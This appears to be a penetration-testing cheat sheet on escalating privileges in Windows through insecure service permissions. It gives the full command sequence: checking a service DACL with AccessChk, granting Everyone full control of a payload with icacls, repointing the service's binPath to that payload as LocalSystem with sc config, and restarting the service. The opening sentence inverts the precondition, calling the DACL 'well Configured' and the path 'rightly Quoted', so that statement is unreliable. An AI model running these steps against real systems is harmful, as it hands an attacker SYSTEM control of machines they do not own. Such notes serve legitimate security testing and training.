Insecure Service Permissions
It is possible taking advantage of a Service if the Service's Executable Discretionary Access Control Lists (DACL) is well Configured and the Service Binary Path is rightly Quoted.
If the Service DACL allow us to Modify the Configuration of a Service we will be able to Reconfigure the Service. This will allow us to point to any Executable.
Analyzing the Service
We can use AccessChk to check for a Service DACL. By Looking at the Output we can see that the Group BUILTIN\Users can Reconfigure any Service (SERVICE_ALL_ACCESS).
- AccessChk
- Output
:: Accept the Eula
accesschk /accepteula
:: Query Service Information
accesschk -qlc "VulnerableService"
[0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_PAUSE_CONTINUE
SERVICE_START
SERVICE_STOP
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
[4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
SERVICE_ALL_ACCESS
Changing the Service Executable
If we need another User to execute the PAYLOAD, we need to grant the Correct Permissions to the Service Executable. In this case we grant Full Permission (F) to the Everyone Group: Everyone:(F)
Modifying the Service. We chose LocalSystem as it is the Highest Privileged Account available.
:: Generate the PAYLOAD of your Preference an assign the Correct Permissions
:: Assign new Permissions
icacls C:\Payload\Path\Payload.exe /grant Everyone:F
:: Changing the Service associated Executable
sc config VulnerableService binPath= "C:\Payload\Path\Payload.exe" obj= LocalSystem
Restarting the Service
In a Normal case Scenario we would likely have to wait for the Service to Restart if we don't have the Required Permissions to Restart the Service.
In case we have the Required Permissions to Restart the Service, we can use the sc command.
sc stop "VulnerableService"
sc start "VulnerableService"